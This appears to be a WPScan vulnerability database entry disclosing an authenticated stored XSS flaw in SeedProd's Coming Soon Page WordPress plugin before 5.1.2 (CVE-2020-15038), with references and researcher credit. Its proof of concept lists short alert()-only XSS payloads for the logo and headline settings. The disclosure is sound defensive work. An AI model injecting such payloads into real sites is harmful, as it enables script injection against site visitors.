Coming Soon Page, Under Construction & Maintenance Mode by SeedProd < 5.1.2 - Authenticated Stored Cross Site Scripting (XSS)



Description
Authenticated stored cross-site scripting issues in some of the plugin settings, requiring high privileges.
Proof of Concept
Affected fields are in the settings of the plugin and will be triggered when the common soon page is displayed (either the preview or normal one):

Logo: x' onerror='alert(/XSS/)
Headlines: <script>alert(/XSS/</script> (for v < 5.1.1), <img src=x onerror=alert(/XSS/)/> (for v < 5.1.2)

Affects Plugin

References

CVE 2020-15038
URL https://www.getastra.com/blog/911/plugin-exploit/stored-xss-coming-soon-page-maintenance-mode-plugin/
URL https://www.jinsonvarghese.com/stored-xss-coming-soon-maintenance-mode-wordpress-plugin/
URL https://wordpress.org/plugins/coming-soon/#developers

Classification

Type XSS
OWASP Top 10 A7: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Original Researcher Jinson Varghese Behanan
Submitter Jinson Varghese Behanan
Submitter Website https://www.jinsonvarghese.com
Submitter Twitter JinsonCyberSec
Views 1536
Verified Yes
WPVDB ID 10283

Timeline

Publicly Published 2020-06-25 (14 days ago)
Added 2020-06-25 (14 days ago)
Last Updated 2020-06-26 (13 days ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin